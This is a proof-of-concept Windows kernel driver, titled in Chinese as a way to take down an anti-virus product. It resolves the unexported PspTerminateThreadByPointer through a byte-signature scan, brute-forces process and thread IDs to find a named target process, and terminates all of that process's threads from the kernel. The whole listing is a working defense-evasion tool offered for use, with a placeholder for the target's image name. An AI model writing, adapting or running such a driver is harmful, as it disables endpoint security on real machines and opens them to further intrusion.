杀死所有线程干掉某杀软 — Kill every thread of a target process (here, an anti-virus agent). Proof-of-concept Windows kernel driver: it resolves the non-exported PspTerminateThreadByPointer by a byte-signature scan, brute-forces thread IDs, and terminates every thread owned by the named process. The signatures and structure offsets below are build- and architecture-specific; see the comments in the listing.

#include <ntddk.h>


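/*
 * Kernel routines used by this driver that ntddk.h does not declare in this form.
 *
 * PspTerminateThreadByPointer is NOT exported. This prototype only documents its
 * calling convention; the driver never links against it. Instead the address is
 * recovered at run time by GetPspLoadImageNotifyRoutine() and called through the
 * PSPTERMINATETHREADBYPOINTER function-pointer typedef below.
 */
NTSTATUS
PspTerminateThreadByPointer(
	IN PETHREAD Thread,
	IN NTSTATUS ExitStatus,
	IN BOOLEAN DirectTerminate
);

/*
 * Exported but undocumented. Returns a pointer to the NUL-terminated image file
 * name byte buffer kept in the EPROCESS (FindProcessByName compares it with
 * _stricmp). The return type is a pointer, not a status code; declaring it as
 * NTSTATUS would truncate the value on 64-bit builds.
 */
PUCHAR
PsGetProcessImageFileName(
	__in PEPROCESS Process
);

/* Documented in ntddk.h; redeclared here with the same signature. On success the
 * returned object carries a reference that the caller must drop with
 * ObDereferenceObject. */
NTSTATUS
PsLookupProcessByProcessId(
	__in HANDLE ProcessId,
	__deref_out PEPROCESS* Process
);

/* Documented in ntddk.h; same reference-ownership rule as above. */
NTSTATUS
PsLookupThreadByThreadId(
	__in HANDLE ThreadId,
	__deref_out PETHREAD* Thread
);

/* Signature used to call the resolved PspTerminateThreadByPointer address. */
typedef NTSTATUS(*PSPTERMINATETHREADBYPOINTER) (PETHREAD pEThread, NTSTATUS ntExitCode, BOOLEAN bDirectTerminate);

/* Forward declarations for the helpers defined below. */
ULONG GetTIDOffset();
PVOID SearchMemory(PVOID pStartAddress, PVOID pEndAddress, PUCHAR pMemoryData, ULONG ulMemoryDataSize);
PVOID GetPspLoadImageNotifyRoutine();
PVOID SearchPspTerminateThreadByPointer(PUCHAR pSpecialData, ULONG ulSpecialDataSize);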
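/*
 * Resolve the address of the non-exported PspTerminateThreadByPointer.
 *
 * NOTE: the function name is misleading (it looks copied from a helper that
 * located PspLoadImageNotifyRoutine) but is kept because KillAllThreads calls it.
 * What it returns is the PspTerminateThreadByPointer address, or NULL.
 *
 * Strategy: the exported PsTerminateSystemThread transfers control to
 * PspTerminateThreadByPointer within its first 0xFF bytes, either by CALL rel32
 * (opcode E8) or JMP rel32 (opcode E9) depending on the OS build and
 * architecture. This routine picks the opcode byte for the running build and
 * SearchPspTerminateThreadByPointer turns the rel32 that follows it into an
 * absolute address.
 *
 * Caveat: the signature is a single byte. It matches the FIRST E8/E9 byte after
 * the function start, whether that byte is an opcode or part of an immediate or
 * displacement, so the result should be treated as unverified on builds other
 * than the ones it was tested on.
 *
 * Supported: Windows 7 (6.1), Windows 8.1 (6.3), Windows 10 (10.x). Windows 8
 * (6.2) and any other build have no signature here and yield NULL instead of a
 * bogus address.
 *
 * Returns the resolved address, or NULL if the build is unsupported, the version
 * query fails, or the scan finds nothing.
 */
PVOID GetPspLoadImageNotifyRoutine()
{
	RTL_OSVERSIONINFOW osInfo = { 0 };
	UCHAR pSpecialData[50] = { 0 };
	ULONG ulSpecialDataSize = 0;

	/* RtlGetVersion requires the caller to fill in dwOSVersionInfoSize. */
	osInfo.dwOSVersionInfoSize = sizeof(osInfo);
	if (!NT_SUCCESS(RtlGetVersion(&osInfo)))
	{
		return NULL;
	}

	if (6 == osInfo.dwMajorVersion)
	{
		if (1 == osInfo.dwMinorVersion)
		{
			/* Windows 7: CALL rel32 on both x86 and x64. */
			pSpecialData[0] = 0xE8;
			ulSpecialDataSize = 1;
		}
		else if (2 == osInfo.dwMinorVersion)
		{
			/* Windows 8: no signature is known for either architecture.
			 * ulSpecialDataSize stays 0 and the function fails below. */
		}
		else if (3 == osInfo.dwMinorVersion)
		{
			/* Windows 8.1: JMP rel32 on x64, CALL rel32 on x86. */
#ifdef _WIN64
			pSpecialData[0] = 0xE9;
#else
			pSpecialData[0] = 0xE8;
#endif
			ulSpecialDataSize = 1;
		}
	}
	else if (10 == osInfo.dwMajorVersion)
	{
		/* Windows 10: JMP rel32 on x64, CALL rel32 on x86. */
#ifdef _WIN64
		pSpecialData[0] = 0xE9;
#else
		pSpecialData[0] = 0xE8;
#endif
		ulSpecialDataSize = 1;
	}

	/* No signature for this build. Refuse here: an empty pattern would match at
	 * the very first byte scanned and produce a garbage function pointer. */
	if (0 == ulSpecialDataSize)
	{
		return NULL;
	}

	return SearchPspTerminateThreadByPointer(pSpecialData, ulSpecialDataSize);
}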

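/*
 * Locate PspTerminateThreadByPointer by scanning PsTerminateSystemThread for a
 * byte signature and decoding the rel32 operand that follows it.
 *
 * pSpecialData / ulSpecialDataSize: the signature bytes (the CALL or JMP opcode
 * chosen by GetPspLoadImageNotifyRoutine). Must be non-NULL and non-empty.
 *
 * The scan window is the first 0xFF bytes of PsTerminateSystemThread. The
 * signature is expected to be immediately followed by a 32-bit signed
 * displacement, and the target is computed the way the CPU does it:
 * target = (address of the byte after the displacement) + displacement.
 *
 * Returns the computed address, or NULL if PsTerminateSystemThread cannot be
 * resolved, the arguments are empty, or the signature is not found. The value is
 * not validated further; a wrong signature match yields an arbitrary pointer.
 */
PVOID SearchPspTerminateThreadByPointer(PUCHAR pSpecialData, ULONG ulSpecialDataSize)
{
	UNICODE_STRING ustrFuncName;
	PVOID pPsTerminateSystemThread = NULL;
	PUCHAR pDisplacement = NULL;
	LONG lOffset = 0;

	if (NULL == pSpecialData || 0 == ulSpecialDataSize)
	{
		return NULL;
	}

	/* PsTerminateSystemThread is exported, so it can be resolved by name. */
	RtlInitUnicodeString(&ustrFuncName, L"PsTerminateSystemThread");
	pPsTerminateSystemThread = MmGetSystemRoutineAddress(&ustrFuncName);
	if (NULL == pPsTerminateSystemThread)
	{
		return NULL;
	}

	/* SearchMemory returns the address just past the signature, i.e. the first
	 * byte of the rel32 displacement. */
	pDisplacement = (PUCHAR)SearchMemory(pPsTerminateSystemThread,
		(PUCHAR)pPsTerminateSystemThread + 0xFF,
		pSpecialData, ulSpecialDataSize);
	if (NULL == pDisplacement)
	{
		return NULL;
	}

	/* rel32 is relative to the end of the displacement field. */
	lOffset = *(PLONG)pDisplacement;
	return (PVOID)(pDisplacement + sizeof(LONG) + lOffset);
}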

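/*
 * Scan [pStartAddress, pEndAddress) for the byte pattern pMemoryData of length
 * ulMemoryDataSize.
 *
 * Returns the address immediately AFTER the first occurrence of the pattern
 * (callers use it to read the operand that follows an opcode), or NULL if the
 * pattern does not occur, any pointer is NULL, the pattern is empty, or the
 * region is smaller than the pattern.
 *
 * Only whole matches that lie inside the region are accepted: the last
 * candidate start is pEndAddress - ulMemoryDataSize, so no byte at or beyond
 * pEndAddress is ever read. (A pattern that starts in range but runs past the
 * end is not a match.) The region is assumed to be readable kernel memory; the
 * function does no probing of its own.
 */
PVOID SearchMemory(PVOID pStartAddress, PVOID pEndAddress, PUCHAR pMemoryData, ULONG ulMemoryDataSize)
{
	PUCHAR pCursor = NULL;
	PUCHAR pLastStart = NULL;

	if (NULL == pStartAddress || NULL == pEndAddress ||
		NULL == pMemoryData || 0 == ulMemoryDataSize)
	{
		return NULL;
	}

	/* Region too small to hold the pattern at all. */
	if ((PUCHAR)pEndAddress < (PUCHAR)pStartAddress + ulMemoryDataSize)
	{
		return NULL;
	}

	pLastStart = (PUCHAR)pEndAddress - ulMemoryDataSize;
	for (pCursor = (PUCHAR)pStartAddress; pCursor <= pLastStart; pCursor++)
	{
		if (RtlCompareMemory(pCursor, pMemoryData, ulMemoryDataSize) == ulMemoryDataSize)
		{
			/* Found: hand back the byte following the pattern. */
			return (PVOID)(pCursor + ulMemoryDataSize);
		}
	}
	return NULL;
}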

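/*
 * Find a process by image file name.
 *
 * Name: the image name to look for, compared case-insensitively against the
 * name returned by PsGetProcessImageFileName for each process.
 * NOTE(review): that name is the short form kept in the EPROCESS and may be
 * truncated; confirm the expected length on the target build.
 *
 * There is no process enumeration here: PIDs 4 .. 0x1000000 (step 4) are tried
 * one by one with PsLookupProcessByProcessId, so the call is slow and any
 * process with a PID outside that range is never seen.
 *
 * Returns the matching EPROCESS with ONE outstanding reference (the one taken by
 * PsLookupProcessByProcessId); the caller owns it and must release it with
 * ObDereferenceObject. Returns NULL when Name is NULL or nothing matches; every
 * non-matching process is dereferenced before moving on.
 */
PEPROCESS FindProcessByName(char* Name)
{
	ULONG pid = 0;

	if (NULL == Name)
	{
		return NULL;
	}

	for (pid = 4; pid < 0x1000000; pid += 4)
	{
		PEPROCESS Process = NULL;
		const char* imageName = NULL;

		if (!NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)pid, &Process)))
		{
			continue;
		}

		imageName = (const char*)PsGetProcessImageFileName(Process);
		if (imageName != NULL && _stricmp(imageName, Name) == 0)
		{
			/* Reference intentionally kept: ownership passes to the caller. */
			return Process;
		}

		ObDereferenceObject(Process);
	}
	return NULL;
}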


/*
 * Driver unload callback. Intentionally empty: DriverEntry registers nothing and
 * allocates nothing that would need releasing here, and the thread terminations
 * performed at load time cannot be undone.
 */
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	
}

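/*
 * Recover the byte offset of the process ID field inside EPROCESS.
 *
 * Despite the name, this does not return a PID. It scans the first bytes of the
 * exported PsGetProcessId for the x86 instruction `mov eax, [eax+disp32]`
 * (encoded 8B 80 <disp32>) and returns disp32. PsGetProcessId loads the PID from
 * the EPROCESS passed in eax, so presumably the first such load is that field.
 *
 * 32-bit only: the 8B 80 form is the x86 encoding, and callers read the field as
 * a 4-byte ULONG. NOTE(review): on an x64 build the first argument arrives in
 * rcx and the encoding differs, so this pattern will not match there.
 *
 * Returns the offset, or 0 if no match is found in the scan window (0 is the
 * failure value; callers must not use it as an offset).
 */
ULONG GetSignaturePID()
{
	/* 100-byte scan window; 6 = size of the 8B 80 disp32 instruction, so the
	 * disp32 read never extends past the window. */
	PUCHAR pCode = (PUCHAR)PsGetProcessId;
	ULONG i = 0;

	for (i = 0; i + 6 <= 100; i++)
	{
		if (pCode[i] == 0x8B && pCode[i + 1] == 0x80)
		{
			return *(ULONG*)(pCode + i + 2);
		}
	}
	return 0;
}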

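/*
 * Terminate every thread belonging to the process PROCESSINFO.
 *
 * How the owner of a thread is determined: GetTIDOffset() gives the offset of
 * the thread ID within ETHREAD. The ID lives in a CLIENT_ID
 * {UniqueProcess, UniqueThread}, so the owning PID is presumably one HANDLE
 * before the TID; this code reads it 4 bytes earlier, which is only right on a
 * 32-bit build (sizeof(HANDLE) == 4). The target's PID is read from the
 * EPROCESS at the offset GetSignaturePID() reports.
 *
 * Thread IDs 4 .. 0x800000 (step 4) are brute-forced with
 * PsLookupThreadByThreadId; threads whose ID is outside that range are missed.
 * Each looked-up ETHREAD carries a reference that is released here whether or
 * not it was terminated.
 *
 * Does nothing when PROCESSINFO is NULL, when either offset scan failed (both
 * scanners return 0 on failure), or when PspTerminateThreadByPointer could not
 * be resolved for this build - in that case no thread is touched rather than
 * calling through a NULL or bogus pointer.
 */
VOID KillAllThreads(PEPROCESS PROCESSINFO)
{
	ULONG pidOffset = 0;
	ULONG tidOffset = 0;
	ULONG targetPid = 0;
	ULONG tid = 0;
	PSPTERMINATETHREADBYPOINTER pfnTerminate = NULL;

	if (NULL == PROCESSINFO)
	{
		return;
	}

	/* Resolve everything once, up front, instead of per matching thread. */
	pidOffset = GetSignaturePID();
	tidOffset = GetTIDOffset();
	if (0 == pidOffset || tidOffset < sizeof(ULONG))
	{
		return;
	}
	pfnTerminate = (PSPTERMINATETHREADBYPOINTER)GetPspLoadImageNotifyRoutine();
	if (NULL == pfnTerminate)
	{
		return;
	}

	targetPid = *(ULONG*)((PUCHAR)PROCESSINFO + pidOffset);

	for (tid = 4; tid < 0x800000; tid += 4)
	{
		PETHREAD pEThread = NULL;
		ULONG ownerPid = 0;

		if (!NT_SUCCESS(PsLookupThreadByThreadId((HANDLE)(ULONG_PTR)tid, &pEThread)))
		{
			continue;
		}

		/* Owning PID sits 4 bytes before the TID (see header comment). */
		ownerPid = *(ULONG*)((PUCHAR)pEThread + tidOffset - sizeof(ULONG));
		if (ownerPid == targetPid)
		{
			pfnTerminate(pEThread, 0, 1);
		}

		/* Drop the lookup reference; without this every thread object in the
		 * system is leaked. */
		ObDereferenceObject(pEThread);
	}
}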

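/*
 * Recover the byte offset of the thread ID field inside ETHREAD.
 *
 * Scans the first bytes of the exported PsGetThreadId for the x86 instruction
 * `mov eax, [eax+disp32]` (encoded 8B 80 <disp32>) and returns disp32.
 * PsGetThreadId loads the TID from the ETHREAD passed in eax, so presumably the
 * first such load is that field.
 *
 * 32-bit only, for the same reason as GetSignaturePID: the pattern is the x86
 * encoding. NOTE(review): an x64 build will not match here.
 *
 * Returns the offset, or 0 if no match is found in the scan window (0 is the
 * failure value; callers must not use it as an offset).
 */
ULONG GetTIDOffset()
{
	/* 100-byte scan window; 6 = size of the 8B 80 disp32 instruction, so the
	 * disp32 read never extends past the window. */
	PUCHAR pCode = (PUCHAR)PsGetThreadId;
	ULONG i = 0;

	for (i = 0; i + 6 <= 100; i++)
	{
		if (pCode[i] == 0x8B && pCode[i + 1] == 0x80)
		{
			return *(ULONG*)(pCode + i + 2);
		}
	}
	return 0;
}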

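/*
 * Driver entry point: find the process named in the FindProcessByName call and
 * terminate all of its threads, then stay loaded.
 *
 * Returns STATUS_UNSUCCESSFUL (driver is unloaded) when no process of that name
 * exists, STATUS_SUCCESS otherwise. The EPROCESS returned by FindProcessByName
 * carries one reference that belongs to us and is released here.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pRet)
{
	PEPROCESS pProcess = NULL;

	UNREFERENCED_PARAMETER(pRet);
	pDriver->DriverUnload = DriverUnload;

#if DBG
	/* Break into the kernel debugger on load. Checked builds only: with no
	 * debugger attached an unhandled breakpoint bugchecks the machine. */
	DbgBreakPoint();
#endif

	/* Replace "????" with the image file name of the process to target. */
	pProcess = FindProcessByName("????");
	if (NULL == pProcess)
	{
		return STATUS_UNSUCCESSFUL;
	}

	KillAllThreads(pProcess);

	/* Release the reference FindProcessByName handed us. (Taking another
	 * reference here instead would leak the process object.) */
	ObDereferenceObject(pProcess);
	return STATUS_SUCCESS;
}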